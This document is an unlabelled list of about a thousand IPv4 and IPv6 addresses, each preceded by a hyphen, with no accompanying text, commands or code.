-121.43.185.139 -2a0a:7d80:1:9::98:281 -38.76.31.250 -107.164.66.198 -107.187.192.148 -163.172.205.239 -176.28.2.0 -216.97.0.170 -162.248.208.197 -198.12.149.88 -174.138.24.198 -174.137.63.122 -121.52.212.133 -108.170.9.195 -103.249.106.123 -106.38.10.203 -220.176.36.4 -185.13.56.46 -47.93.196.143 -204.197.255.199 -216.14.118.118 -121.40.85.174 -156.237.178.131 -71.19.249.95 -216.117.128.92 -216.75.37.170 -172.110.28.110 -94.23.194.115 -163.172.192.150 -120.76.85.1 -159.148.20.115 -23.239.25.235 -2a0a:7d80:1:7::103:251 -192.241.119.77 -142.54.177.236 -23.238.176.216 -201.193.214.130 -45.77.170.64 -172.247.51.73 -45.114.117.150 -70.36.125.58 -77.75.32.158 -103.41.126.71 -34.229.143.161 -172.255.173.5 -198.143.170.144 -198.143.146.139 -217.16.10.6 -209.222.20.147 -107.187.41.121 -124.243.223.15 -104.238.66.93 -45.76.234.238 -2a0a:7d80:1:7::105:8e -91.121.81.176 -69.64.81.104 -217.13.93.63 -198.24.151.114 -156.235.169.175 -45.76.191.152 -139.199.36.212 -139.196.229.238 -91.142.223.1 -107.178.149.70 -198.12.157.83 -45.77.32.209 -122.13.178.122 -103.21.142.25 -185.25.60.225 -13.127.154.147 -36.110.10.2 -120.26.229.174 -23.238.166.135 -172.247.51.19 -200.16.120.45 -144.217.86.192 -198.23.73.18 -185.5.53.148 -164.132.196.244 -23.230.19.25 -51.255.149.84 -23.110.56.86 -112.121.172.163 -107.165.201.208 -176.31.192.87 -216.17.108.175 -185.19.180.62 -69.87.199.4 -103.240.215.104 -108.51.159.224 -45.114.94.169 -37.59.132.225 -124.16.242.67 -134.119.64.193 -163.44.174.106 -156.235.171.37 -104.202.185.104 -194.19.246.49 -151.9.134.109 -75.126.58.133 -176.31.192.86 -5.196.216.133 -138.197.199.221 -5.178.109.169 -34.225.217.156 -125.212.224.166 -142.4.201.181 -216.158.235.6 -185.12.111.96 -194.19.246.37 -85.254.126.72 -193.41.247.68 -121.29.42.83 -2a0a:7d80:1:7::94:c5 -122.13.79.145 -116.55.241.74 -185.116.165.33 -202.6.17.175 -120.24.52.242 -80.91.37.136 -103.221.220.119 -104.202.185.99 -172.246.196.120 -122.214.243.76 -23.230.19.108 -125.212.196.185 -123.207.243.201 -133.130.107.251 -31.192.110.168 -144.48.9.72 -139.129.59.47 -198.23.88.87 -23.225.89.30 -162.254.3.250 -118.31.19.74 -116.236.231.192 -108.168.198.100 -101.201.37.105 -185.28.108.69 -31.130.201.130 -192.241.218.56 -2600:3c03::f03c:91ff:feb0:d7ff -103.235.104.98 -52.185.155.167 -172.255.173.94 -46.105.220.156 -163.44.171.192 -172.246.196.104 -212.83.164.53 -123.56.47.20 -69.65.56.186 -166.62.62.55 -101.236.18.61 -172.87.197.212 -134.119.37.236 -107.187.41.180 -188.132.147.106 -194.145.209.224 -156.235.172.87 -171.244.4.93 -45.32.130.247 -199.167.129.57 -149.56.20.237 -103.230.121.245 -210.14.138.136 -5.135.68.201 -104.251.219.136 -2a0a:7d80:1:7::97:323 -117.121.9.114 -77.93.194.61 -2a0a:7d80:1:7::100:192 -162.247.154.52 -217.195.123.65 -150.95.109.140 -2a0a:7d80:1:9::99:166 -2a0a:7d80:1:7::101:92 -159.8.20.250 -103.53.76.18 -156.235.168.52 -103.58.103.246 -112.196.27.243 -176.31.36.206 -103.204.76.116 -158.69.193.37 -37.139.23.196 -2a00:c70:1:185:10:99:48:1 -64.50.175.60 -217.146.76.2 -195.154.221.101 -103.240.215.19 -2a02:c207:0:1580::1 -118.178.18.232 -139.196.153.61 -103.240.215.2 -37.59.217.46 -80.233.244.67 -149.56.238.37 -37.187.55.25 -58.16.86.74 -121.41.21.76 -103.240.215.128 -171.92.207.136 -101.201.114.83 -51.15.183.133 -173.255.195.57 -72.52.136.42 -192.198.112.246 -166.62.91.253 -223.84.134.16 -45.33.20.185 -23.224.115.131 -213.175.95.219 -41.84.131.12 -2a0a:7d80:1:7::93:7 -204.93.61.100 -23.110.56.108 -23.224.115.223 -178.32.190.41 -114.244.13.202 -182.163.102.16 -115.28.55.70 -172.246.196.45 -64.237.52.37 -103.240.212.135 -120.26.233.74 -122.114.47.100 -119.28.61.218 -109.239.63.109 -163.44.193.15 -104.232.102.172 -50.28.8.131 -120.26.100.177 -217.160.20.32 -46.38.232.143 -119.29.139.202 -203.25.227.74 -35.190.137.60 -85.31.102.11 -23.104.135.187 -172.252.10.130 -5.178.109.66 -2600:3c03::f03c:91ff:feb0:733a -119.29.58.24 -123.60.202.242 -159.65.42.207 -198.27.68.135 -89.108.108.79 -103.28.148.130 -88.200.200.133 -176.28.49.214 -92.241.174.131 -194.58.98.89 -23.250.115.121 -45.35.163.80 -101.81.240.16 -194.19.246.39 -45.56.73.35 -182.92.157.133 -198.147.26.28 -107.187.201.123 -91.121.191.183 -5.196.86.74 -101.236.19.104 -72.55.139.47 -172.246.220.118 -195.191.25.236 -2a0a:7d80:1:7::91:1bd -201.86.212.93 -23.110.61.100 -173.192.74.251 -139.162.49.213 -23.110.47.232 -200.69.5.8 -178.62.210.57 -103.240.212.231 -122.9.15.48 -192.155.252.113 -139.196.143.180 -45.113.154.188 -169.53.183.103 -94.103.43.98 -199.102.44.119 -49.212.169.75 -23.229.12.174 -120.77.148.138 -5.152.201.116 -112.74.207.108 -121.196.225.158 -128.199.142.169 -188.186.8.45 -88.255.52.21 -120.31.129.66 -2400:8901::f03c:91ff:fe79:8452 -182.160.127.226 -46.17.45.19 -150.95.141.95 -188.132.147.17 -106.14.255.107 -66.85.95.13 -219.132.232.186 -2a0a:7d80:1:7::92:207 -107.178.150.106 -120.76.29.23 -182.254.157.35 -45.76.185.236 -94.23.219.189 -5.45.78.21 -101.69.170.73 -172.255.173.214 -120.236.139.178 -52.25.135.69 -37.187.48.21 -5.178.109.75 -148.251.13.99 -217.150.94.103 -47.92.108.93 -216.17.110.16 -146.185.153.173 -119.9.104.159 -103.240.213.249 -194.19.246.141 -52.68.33.227 -119.29.15.234 -172.107.146.138 -103.240.214.231 -122.9.229.164 -199.101.134.194 -67.228.102.73 -23.111.166.3 -185.33.234.83 -2a0a:7d80:1:7::100:22 -192.232.195.243 -45.114.94.217 -213.187.80.8 -94.23.113.148 -85.204.50.35 -47.52.250.101 -67.207.82.206 -5.61.43.55 -125.71.203.160 -103.240.215.25 -67.205.102.234 -150.95.157.195 -2a0a:7d80:1:7::102:1b0 -54.194.117.30 -103.240.215.100 -45.42.94.189 -120.77.224.71 -104.232.75.190 -119.6.84.84 -103.10.191.191 -211.141.92.41 -212.129.53.20 -124.192.148.29 -92.127.156.174 -149.202.122.37 -122.156.111.14 -149.56.22.195 -115.28.74.125 -62.117.65.157 -23.244.241.160 -91.224.194.205 -172.247.35.163 -121.41.15.93 -192.40.58.21 -212.73.87.130 -52.174.51.226 -115.29.170.159 -23.110.47.244 -115.236.79.58 -124.243.223.13 -5.77.56.84 -123.56.92.115 -31.192.110.189 -142.4.23.233 -43.224.34.241 -156.235.169.26 -166.62.126.17 -78.24.221.39 -52.37.251.25 -176.32.87.179 -103.242.109.87 -103.53.197.100 -37.97.128.73 -101.200.181.35 -27.254.139.57 -209.222.10.234 -94.23.199.158 -103.205.3.79 -185.146.86.28 -23.19.202.27 -104.202.185.43 -23.225.89.125 -61.152.74.153 -23.88.82.125 -103.240.212.52 -46.252.29.236 -27.254.140.61 -123.31.29.29 -2a0a:7d80:1:7::104:48 -54.37.15.47 -185.122.140.70 -185.49.22.10 -123.207.245.125 -182.16.85.179 -200.153.127.22 -104.243.46.214 -182.92.107.15 -45.32.127.33 -193.226.146.120 -52.198.32.118 -216.117.191.156 -188.226.131.18 -23.238.129.69 -198.100.177.164 -5.175.41.13 -165.225.150.193 -203.189.97.212 -23.244.241.39 -144.217.233.127 -213.159.6.145 -118.178.56.17 -183.221.63.9 -66.211.106.9 -64.120.123.140 -60.175.199.195 -217.150.94.95 -23.229.227.171 -211.152.43.162 -2a0a:7d80:1:7::92:1c2 -130.251.169.97 -103.29.190.9 -74.201.38.172 -23.110.56.93 -204.14.31.158 -58.240.217.242 -31.13.130.109 -88.119.50.57 -107.180.84.47 -37.139.19.134 -186.121.251.251 -123.60.202.231 -167.114.51.83 -198.200.41.55 -108.170.59.218 -188.226.161.196 -91.224.194.30 -2a01:7e00::f03c:91ff:fe69:e858 -178.33.92.201 -5.135.58.92 -95.183.52.111 -173.236.41.141 -103.81.168.177 -37.143.13.132 -58.181.138.45 -45.35.163.69 -23.230.19.18 -107.170.97.31 -106.14.98.171 -69.16.214.139 -142.91.241.92 -168.205.252.35 -174.139.70.154 -178.33.179.21 -128.199.104.93 -192.99.109.22 -104.202.185.184 -47.91.211.199 -164.132.83.1 -202.152.94.152 -197.249.0.223 -157.52.240.68 -159.65.134.177 -45.114.118.135 -111.230.173.155 -172.255.173.53 -79.125.113.66 -2a0a:7d80:1:7::92:105 -124.158.6.222 -91.236.183.73 -27.118.26.150 -64.71.72.220 -45.42.94.159 -208.109.54.159 -218.93.207.51 -122.114.46.117 -123.1.189.230 -103.15.200.211 -67.225.188.103 -5.79.120.135 -177.126.245.197 -159.148.20.120 -197.255.125.210 -188.166.195.234 -192.166.218.250 -188.166.15.19 -185.36.100.225 -142.91.232.109 -60.206.36.19 -91.134.151.89 -116.196.71.76 -123.60.202.252 -118.123.249.57 -54.251.187.58 -199.119.136.220 -107.179.102.198 -122.9.22.147 -77.78.97.22 -185.4.148.126 -122.13.169.172 -155.94.205.157 -103.240.212.237 -173.249.3.168 -185.13.57.249 -132.255.70.134 -98.124.177.172 -222.239.255.235 -103.240.213.153 -218.32.216.149 -189.76.176.16 -35.161.115.163 -122.9.18.131 -72.52.136.69 -62.63.190.67 -83.223.106.240 -23.230.19.6 -107.164.66.56 -2a0a:7d80:1:7::102:226 -103.199.16.144 -31.166.105.191 -193.70.68.189 -120.77.157.161 -80.247.66.140 -112.16.181.59 -23.238.166.162 -188.166.248.29 -121.42.27.95 -125.95.19.254 -208.167.225.106 -23.88.142.139 -123.206.228.246 -103.213.251.115 -47.90.49.224 -111.202.15.51 -124.158.6.46 -23.238.176.205 -104.202.185.42 -173.252.197.115 -82.193.95.28 -122.14.200.134 -149.56.165.172 -50.116.27.4 -182.16.97.171 -139.129.31.193 -69.61.16.210 -188.247.40.231 -49.212.194.38 -67.225.134.232 -45.35.163.29 -120.25.233.21 -137.74.154.67 -178.33.49.156 -158.69.131.214 -2a0a:7d80:1:7::92:85 -122.114.94.42 -2a0a:7d80:1:9::99:14a -183.27.133.127 -107.161.18.182 -160.16.102.212 -149.62.173.225 -123.60.202.227 -23.252.171.197 -155.254.16.18 -103.56.112.240 -2a0a:7d80:1:7::101:28 -80.1.73.182 -150.95.176.161 -2a0a:7d80:1:7::97:181 -91.250.87.232 -82.135.148.13 -142.91.241.78 -104.203.82.185 -89.44.32.111 -107.178.147.70 -142.91.95.27 -159.203.54.105 -188.166.208.54 -65.18.120.20 -45.114.94.134 -120.55.84.18 -120.25.246.23 -84.200.2.29 -93.188.165.33 -115.28.86.224 -60.214.103.60 -54.70.32.160 -216.92.223.37 -107.183.17.172 -182.254.242.18 -107.181.250.196 -79.137.21.118 -110.172.221.47 -64.64.4.26 -52.32.208.228 -54.81.241.162 -172.106.186.54 -178.33.203.127 -2a0a:7d80:1:7::106:21a -211.149.192.211 -69.50.235.117 -80.233.244.21 -47.96.164.141 -5.178.109.243 -31.220.53.148 -52.78.69.47 -138.68.166.238 -91.121.76.69 -210.245.26.12 -185.14.185.127 -107.181.135.107 -192.99.78.13 -111.202.15.42 -45.32.175.133 -93.17.133.171 -51.255.126.254 -2a0a:7d80:1:7::93:121 -2a0d:7e00::200 -172.246.220.128 -45.114.94.244 -45.61.115.48 -178.32.157.90 -174.138.24.19 -112.125.122.232 -202.157.177.39 -103.240.212.156 -37.143.29.42 -190.187.120.250 -120.79.115.9 -89.105.200.202 -5.45.75.93 -220.162.247.161 -107.187.221.251 -138.197.77.8 -103.100.157.90 -122.160.174.8 -46.21.196.149 -184.107.209.77 -211.152.45.73 -103.12.50.16 -178.33.48.182 -121.52.212.231 -116.236.167.74 -82.135.151.151 -80.233.141.203 -218.32.216.180 -120.25.151.240 -166.62.57.10 -61.216.157.82 -23.225.113.253 -185.42.28.6 -111.118.181.202 -173.82.77.226 -52.60.36.86 -51.254.5.217 -137.74.59.183 -164.132.83.5 -78.138.146.50 -47.254.25.56 -2a0a:7d80:1:7::96:286 -192.99.207.230 -185.77.65.178 -151.80.141.66 -178.33.111.139 -103.205.1.107 -180.162.255.20 -50.97.66.225 -122.96.142.251 -107.148.207.66 -86.104.177.4 -193.106.203.123 -35.198.198.105 -219.83.160.102 -103.94.0.150 -123.207.4.11 -119.81.89.139 -54.205.198.155 -156.237.179.106 -121.199.48.35 -114.55.72.20 -134.119.175.52 -98.124.177.148 -45.77.101.208 -172.246.220.195 -103.248.96.161 -172.247.51.235 -81.171.24.117 -2a0a:7d80:1:7::93:1d9 -124.243.223.46 -103.28.38.173 -187.63.160.18 -194.29.63.157 -77.75.32.156 -122.114.32.47 -213.136.91.240 -23.244.241.10 -183.60.233.215 -139.129.41.199 -5.178.109.201 -202.96.35.85 -37.59.54.41 -159.89.155.20 -2a0a:7d80:1:7::97:2ec -137.74.17.80 -47.52.78.63 -174.138.17.76 -153.120.93.11 -198.50.220.206 -92.65.99.218 -220.181.86.41 -45.63.28.157 -194.63.141.191 -132.148.17.27 -192.52.166.7 -77.104.183.70 -177.129.77.31 -47.104.60.249 -158.69.36.18 -173.243.113.151 -13.71.126.32 -198.176.52.173 -182.92.69.30 -120.78.231.189 -123.81.253.86 -95.85.30.73 -103.60.126.221 -134.119.22.59 -103.210.239.32 -139.162.71.242 -103.240.213.165 -146.185.174.30 -172.252.10.37 -188.166.236.212 -103.205.1.80 -182.16.49.108 -103.244.0.39 -54.249.158.19 -2a0a:7d80:1:7::103:3ab -178.33.67.53 -182.163.126.223 -210.235.15.129 -172.246.220.22 -218.244.156.143 -204.93.61.130 -107.187.41.243 -145.239.35.29 -66.254.184.140 -209.137.223.35 -86.107.110.196 -45.41.92.159 -103.1.220.123 -37.230.99.250 -184.164.143.107 -192.169.54.145 -45.35.163.149 -194.19.246.69 -46.17.97.90 -120.92.237.94 -87.118.114.200 -91.121.226.231 -194.187.79.29 -79.98.25.118 -62.128.110.48 -43.229.39.144 -117.41.180.200 -107.178.149.105 -204.27.59.134 -91.221.163.28 -124.158.6.218 -199.180.134.188 -134.119.241.64 -103.198.195.13 -173.236.111.171 -58.243.255.52 -187.72.231.91 -202.162.234.121 -39.106.178.217 -120.77.202.128 -101.37.14.90 -72.249.158.50 -189.45.198.238 -128.199.180.5 -128.199.235.221 -213.158.170.9 -94.23.92.216 -103.248.255.238 -103.232.146.44 -190.152.17.124 -185.118.55.151 -91.194.60.215 -172.104.57.47 -172.255.173.148 -106.15.41.24 -123.146.170.76 -122.9.22.173 -111.223.246.216 -180.167.85.62 -138.201.86.136 -89.44.32.115 -37.97.194.245 -120.78.181.88 -192.99.200.229 -173.208.222.140 -39.108.72.77 -2a0a:7d80:1:9::99:1e8 -120.26.200.237 -204.44.66.11 -115.187.17.202 -62.63.190.25 -111.67.197.81 -173.254.213.34 -112.74.134.221 -118.178.243.214 -103.193.173.49 -149.56.231.64 -87.118.119.75 -107.187.41.220 -122.226.217.118 -182.18.161.188 -188.120.226.240 -118.82.9.235 -54.39.37.71 -81.0.217.205 -42.96.197.253 -62.63.190.8 -133.130.101.241 -61.175.103.133 -172.255.173.225 -103.240.213.220 -185.23.24.81 -192.111.145.234 -159.148.20.102 -45.42.94.135 -43.255.123.80 -156.67.216.78 -216.17.100.39 -50.97.247.210 -194.19.246.22 -84.19.163.33 -66.171.239.103 -172.246.196.26 -45.35.163.251 -69.64.95.254 -115.28.180.215 -89.33.247.29 -185.141.27.151 -91.109.9.11 -84.246.210.95 -190.186.250.206 -172.107.75.221 -45.35.163.59 -121.40.125.237 -107.181.179.18 -114.55.173.75 -203.143.21.234 -2a0a:7d80:1:7::103:398 -23.19.237.3 -91.250.113.86 -139.199.163.81 -209.126.96.93 -136.0.69.186 -188.226.198.230 -13.75.105.5 -123.57.82.112 -177.104.124.186 -133.242.121.217 -122.9.18.138 -196.11.82.10 -95.173.170.42 -77.104.137.230 -5.196.203.204 -124.40.255.37 -64.237.45.90 -120.27.15.40 -82.135.151.62 -213.73.1.126 -198.50.142.170 -172.246.196.73 -103.45.98.204 -118.24.47.197 -188.241.88.70 -39.108.8.21 -115.29.160.35 -103.59.41.107 -23.230.19.222 -2a0a:7d80:1:7::103:cd -172.107.73.229 -103.250.21.99 -142.91.232.112 -173.193.149.108 -188.166.217.161 -103.253.115.193 -110.16.81.202 -103.205.0.117 -14.128.22.141 -23.238.129.121 -104.236.8.24 -217.182.103.151 -103.198.192.31 -78.129.229.116 -46.105.77.37 -54.248.93.51 -173.193.8.191 -89.163.140.102 -177.69.103.164 -188.166.43.227 -120.26.240.19 -116.89.242.146 -107.187.201.124 -103.240.212.160 -216.224.164.92 -106.14.179.231 -101.200.181.141 -149.202.76.33 -202.99.203.174 -172.255.173.133 -61.153.243.182 -223.223.201.54 -64.71.8.171 -103.3.60.224 -66.254.163.2 -23.238.166.181 -211.149.228.75 -5.44.216.13 -69.30.55.167 -185.145.128.144 -54.69.234.98 -139.59.243.251 -120.92.234.125 -163.172.68.134 -106.14.96.72 -121.40.186.56 -45.118.134.245 -192.99.230.41 -122.9.15.41 -87.237.204.166 -104.243.139.164 -198.200.41.81 -37.1.199.59 -5.39.124.71 -112.124.65.22 -64.186.168.155 -202.146.208.185 -122.53.126.12 -80.241.223.205 -65.18.120.14 -157.7.136.229 -37.153.109.99 -173.236.115.168 -209.59.177.45 -169.54.214.72 -66.254.175.41 -76.81.80.62 -78.129.146.54 -175.126.168.71 -107.180.84.45 -61.147.80.159 -123.57.60.188 -103.240.215.176 -45.252.248.114 -129.16.132.5 -128.199.68.214 -107.178.147.79 -198.24.161.137 -114.55.102.138 -115.29.14.160 -188.93.13.254 -96.127.170.130 -182.150.21.148 -106.75.143.55 -119.6.43.251 -175.170.187.139 -121.199.0.106 -178.170.217.12 -178.33.30.163 -54.161.118.145 -45.35.163.137 -185.2.151.73 -160.153.36.198 -159.148.192.234 -78.28.135.50 -61.172.253.163 -180.180.240.30 -38.126.203.74 -119.29.91.195 -23.225.0.156 -103.240.215.42 -202.3.15.60 -104.203.82.93 -112.140.185.205 -216.17.108.127 -140.207.53.102 -159.148.37.109 -5.45.75.118 -103.12.49.32 -104.155.151.116 -172.255.159.224 -116.236.231.220 -203.177.33.61 -173.193.149.98 -2a0a:7d80:1:7::104:54 -54.234.133.200 -144.217.237.9 -188.165.33.126 -82.135.151.150 -67.196.126.240 -201.73.145.86 -75.126.221.186 -207.154.230.78 -45.42.94.149 -125.6.139.246 -79.101.32.138 -178.16.25.24 -144.168.69.149 -176.31.31.237 -31.220.56.117 -138.197.112.46 -164.132.228.227 -101.200.188.200 -120.143.4.159 -192.122.200.114 -23.225.113.46 -120.27.218.6 -122.114.126.60 -183.129.44.253 -195.146.84.135 -142.91.95.59 -212.252.213.254 -184.154.19.59 -195.154.174.72 -172.252.10.53 -103.100.157.93 -185.35.67.48 -81.7.114.172 -64.110.129.48 -103.215.72.229 -134.119.97.234 -45.79.135.225 -139.255.54.187 -2a0a:7d80:1:7::102:dc -192.163.217.152 -45.32.26.84 -71.19.253.69 -178.20.158.75 -103.205.0.67 -106.15.204.151 -217.182.39.52 -116.239.6.148 -2a0a:7d80:1:7::91:c1 -163.172.62.39 -103.221.220.215 -106.75.166.126 -121.40.140.171 -194.19.246.15 -188.213.48.71 -71.19.249.94 -110.80.24.59 -58.119.228.242 -112.121.175.77 -23.225.0.164 -95.85.42.6 -216.92.86.72 -72.52.136.44 -67.23.166.208 -27.118.26.130 -125.208.9.179 -193.225.91.153 -78.140.171.185 -172.246.220.246 -113.91.170.108 -194.19.246.33 -64.118.92.8 -62.112.9.80 -39.106.176.57 -203.131.193.94 -93.92.197.70 -172.106.184.56 -195.154.57.190 -174.138.9.31 -209.59.185.13 -103.240.214.223 -95.181.199.73 -192.186.175.94 -104.238.103.80 -194.242.112.116 -65.111.176.200 -47.88.50.56 -188.93.95.248 -109.169.76.65 -78.46.220.165 -120.77.11.193 -79.170.91.164 -45.79.186.61 -45.43.207.13 -69.61.64.178 -2a0a:7d80:1:7::91:b9 -167.114.51.91 -122.9.18.163 -158.69.7.191 -202.62.138.17 -85.95.239.65 -91.184.13.146 -39.108.221.176 -176.38.10.43 -103.240.214.252 -119.29.1.140 -46.29.21.212 -61.174.50.57 -183.81.161.107 -139.196.104.150 -43.240.12.215 -67.229.77.196 -136.144.170.228 -189.113.8.59 -85.222.231.145 -54.84.90.65 -222.219.96.151 -45.114.94.7 -120.26.230.138 -54.245.100.102 -119.29.81.81 -178.62.3.205 -177.73.237.229 -91.121.62.43 -45.117.160.39 -118.178.120.182 -108.163.166.244 -139.196.175.166 -37.58.76.161 -5.34.200.21 -172.110.20.194 -118.31.248.159 -185.175.208.106 -194.19.246.57 -60.205.187.158 -153.126.186.220 -52.214.152.131 -188.165.237.5 -210.211.121.122 -218.56.99.26 -45.61.114.58 -42.112.16.80 -112.185.44.96 -222.249.239.6 -220.233.248.130 -172.252.10.234 -66.70.223.76 -172.255.159.249 -51.254.235.62 -180.250.238.107 -2a0a:7d80:1:7::96:1f -142.4.107.221 -2a0a:7d80:1:9::99:2c6 -211.149.159.136 -50.31.4.145 -153.122.12.19 -222.77.181.204 -212.204.202.118 -45.61.115.27 -45.124.253.25 -107.187.199.99 -188.166.230.169 -199.15.206.104 -178.33.33.33 -222.255.175.72 -84.238.141.236 -115.29.144.192 -91.134.228.230 -104.224.201.249 -185.164.138.205 -198.15.119.150 -72.51.36.92 -128.199.109.211 -101.201.141.236 -137.74.33.161 -23.229.124.45 -117.48.214.43 -103.11.222.66 -86.127.62.142 -66.39.2.215 -122.214.243.77 -188.132.224.43 -192.99.236.70 -111.67.198.100 -173.239.46.46 -185.13.58.209 -198.50.136.173 -139.99.113.232 -23.238.129.102 -2a0a:7d80:1:9::98:257 -133.242.86.211 -185.57.82.62 -23.225.145.174 -217.74.14.7 -111.118.187.75 -46.248.186.24 -49.212.201.29 -122.9.18.166 -104.168.144.19 -83.142.189.99 -120.78.198.49 -37.106.117.150 -103.229.128.95 -79.137.28.19 -45.42.94.144 -111.223.13.201 -211.23.145.2 -178.32.53.88 -62.212.130.145 -172.104.88.172 -118.69.174.235 -92.241.174.169 -92.53.91.60 -5.135.58.90 -23.19.237.19 -24.106.137.59 -155.94.205.147 -69.90.8.158 -139.199.184.104 -176.221.111.82 -142.91.239.80 -217.23.15.162 -189.76.210.131 -163.172.121.88 -61.160.212.227 -91.206.218.30 -62.210.181.21 -159.203.207.41 -195.8.206.142 -220.175.154.24 -107.180.70.185 -23.88.82.200 -139.129.15.207 -213.240.172.53 -71.146.64.18 -45.33.76.47 -149.56.26.116 -172.246.220.208 -66.70.224.230 -96.8.118.138 -103.21.225.237 -104.161.79.104 -93.115.31.78 -157.52.240.94 -2a0a:7d80:1:7::91:24f -159.65.35.80 -123.206.57.151 -113.106.98.18 -220.164.71.44 -5.178.109.101 -159.253.153.57 -193.0.201.200 -140.143.96.61 -50.19.224.78 -85.93.88.250 -91.213.238.141 -185.153.220.174 -121.40.85.122 -2a0a:7d80:1:9::98:b3 -104.128.230.33 -54.212.91.76 -103.240.214.209 -59.153.61.180 -175.111.91.38 -185.135.9.34 -213.136.85.204 -45.33.30.183 -134.119.38.217 -115.159.107.150 -172.255.173.26 -208.110.64.228 -80.249.170.176 -172.247.51.14 -166.62.81.238 -172.255.173.2 -121.42.136.185 -114.55.0.160 -116.62.12.126 -122.225.202.20 -119.81.89.137 -45.35.163.188 -122.9.18.150 -178.33.174.200 -5.178.109.142 -185.183.160.135 -120.26.125.101 -79.175.168.165 -5.135.197.58 -123.56.236.72 -2a0a:7d80:1:7::91:1f -85.214.47.81 -104.171.9.230 -200.109.231.141 -114.143.239.150 -67.225.131.220 -23.95.10.193 -142.91.95.60 -5.45.72.104 -201.49.44.40 -45.32.59.89 -45.252.250.224 -193.226.146.114 -122.114.162.118 -220.181.86.26 -174.138.8.47 -172.246.129.182 -49.1.244.139 -188.214.30.158 -5.153.42.13 -118.178.24.68 -45.32.249.99 -23.110.61.114 -182.92.1.162 -106.186.118.62 -122.9.18.190 -202.153.179.195 -51.255.128.35 -77.88.197.196 -139.210.77.80 -27.133.136.166 -159.65.134.241 -103.28.38.15 -120.76.75.36 -192.99.41.128 -182.254.244.73 -182.254.213.62 -216.17.108.170 -90.83.59.234 -87.118.89.186 -116.62.227.191 -111.171.217.145 -2a0a:7d80:1:7::100:35 -94.101.81.147 -185.85.204.232 -2001:470:1f04:100c::2 -123.30.183.132 -91.142.222.5 -115.159.97.71 -148.251.68.150 -193.68.112.132 -47.89.240.132 -211.159.170.92 -54.93.89.176 -37.143.10.54 -85.17.66.163 -107.182.238.248 -203.171.227.139 -178.32.209.215 -212.68.57.182 -119.163.106.200 -103.196.240.106 -103.25.193.252 -45.77.68.26 -2a0a:7d80:1:7::102:311 -103.240.213.114 -213.189.63.161 -124.133.97.227 -101.200.157.131 -66.171.239.236 -192.162.112.22 -45.252.248.171 -85.17.199.64 -176.9.34.36 -112.74.196.218 -182.253.20.110 -79.137.68.205 -151.80.214.165 -95.140.43.94 -172.107.146.183 -119.29.229.244 -61.90.143.86 -2a0a:7d80:1:7::102:166 -101.82.131.84 -139.129.164.202 -54.64.60.199 -121.10.118.254 -123.56.115.60 -150.95.149.161 -120.27.163.103 -119.29.103.205 -98.143.144.100 -94.23.173.74 -101.251.251.194 -185.43.220.176 -31.192.111.23 -104.202.185.155 -196.45.123.13 -218.28.235.126 -202.53.11.29 -23.27.117.133 -61.221.12.41 -78.111.82.108 -172.102.197.170 -101.201.38.141 -45.35.99.190 -46.105.221.65 -221.2.151.14 -164.70.8.66 -144.217.76.54 -45.114.94.5 -103.56.158.191 -183.81.153.170 -182.245.126.226 -78.47.73.123 -112.124.111.125 -173.243.113.156 -208.94.238.43 -91.83.232.90 -106.3.38.5 -70.36.125.38 -66.171.236.210 -170.75.149.97 -122.114.175.71 -185.193.141.87 -78.111.82.102 -142.91.95.15 -34.242.114.207 -118.190.77.217 -187.226.209.252 -89.19.14.108 -60.6.250.9 -195.245.112.232 -23.225.239.229 -49.212.196.93 -192.241.139.107 -45.35.163.231 -150.95.184.53 -121.40.91.224 -23.229.7.110 -104.202.185.168 -104.224.198.168 -82.201.41.18 -159.253.44.212 -54.92.18.39 -113.105.123.165 -178.79.162.203 -113.196.233.253 -182.160.101.85 -174.37.182.168 -92.50.183.42 -107.178.150.113 -188.120.249.165 -212.9.96.88 -34.238.241.17 -107.179.93.51 -103.240.215.135 -121.224.203.232 -192.81.208.43 -172.110.6.48 -94.23.113.151 -121.40.97.151 -173.254.231.187 -120.26.96.231 -115.239.238.106 -178.33.223.82 -172.246.196.144 -34.196.199.76 -91.204.155.142 -101.201.144.163 -192.99.230.195 -45.63.94.45 -120.77.58.141 -142.91.232.92 -182.92.167.78 -188.132.135.54 -132.148.141.211 -45.42.94.190 -115.29.111.218 -185.78.66.100 -91.150.190.92 -104.251.217.105 -203.114.74.76 -150.95.129.119 -54.213.171.149 -107.187.41.70 -119.131.218.244 -172.107.71.22 -124.243.223.31 -217.147.91.154 -120.26.90.209 -61.188.18.232 -172.104.122.36 -185.21.101.237 -69.65.38.53 -68.168.112.13 -192.99.58.52 -172.106.186.23 -69.195.135.123 -213.74.19.58 -173.236.43.132 -50.115.137.3 -121.43.192.151 -185.122.140.104 -188.93.126.147 -52.43.172.166 -47.92.103.125 -172.246.220.46 -107.178.147.76 -213.159.212.66 -217.182.76.249 -122.9.235.215 -107.178.162.93 -176.31.39.137 -185.80.162.27 -112.74.82.159 -120.25.149.216 -107.6.174.187 -23.19.202.22 -115.28.235.76 -104.128.230.37 -177.220.131.222 -185.8.172.123 -76.12.219.91 -35.167.225.221 -122.9.18.175 -172.107.73.243 -74.208.192.77 -66.171.161.50 -5.178.109.65 -103.100.157.105 -114.55.7.169 -62.76.189.205 -192.186.129.45 -139.162.17.205 -201.16.144.197 -150.95.174.73 -82.135.148.38 -116.213.39.60 -103.76.171.99 -23.239.25.212 -185.95.84.30 -119.167.100.138 -23.19.202.57 -116.126.142.92 -211.87.72.194 -5.145.174.15 -185.122.140.76 -107.179.102.211 -86.106.137.181 -194.135.112.212 -185.52.2.39 -106.186.29.223 -103.240.214.34 -221.140.57.203 -103.28.38.66 -69.167.188.181 -103.240.212.121 -80.73.133.254 -125.212.235.70 -45.32.104.143 -98.124.176.175 -104.232.75.155 -82.103.135.178 -195.154.165.221 -67.205.156.2 -45.42.94.132 -184.173.186.147 -192.241.207.121 -123.59.101.78 -45.32.242.18 -184.107.132.131 -169.48.65.137 -91.237.108.43 -221.9.252.155 -87.248.163.56 -199.119.138.253 -166.63.21.83 -162.13.127.213 -5.39.86.196 -124.192.148.35 -64.237.48.166 -103.240.212.11 -23.110.61.99 -211.159.157.159 -172.252.10.14 -172.246.196.129 -202.146.208.183 -2a0a:7d80:1:7::105:370 -202.90.158.151 -103.240.212.234 -89.219.22.123 -209.222.10.108 -47.90.102.168 -211.155.88.62 -192.99.230.49 -104.202.185.15 -211.20.187.221 -59.163.248.84 -173.252.208.2 -87.118.108.16 -149.202.42.199 -66.171.238.227 -192.69.134.206 -222.89.83.193 -222.239.10.133 -209.124.68.228 -23.238.145.116 -192.99.180.152 -156.237.179.114 -45.55.188.17 -103.100.157.22 -69.87.198.119 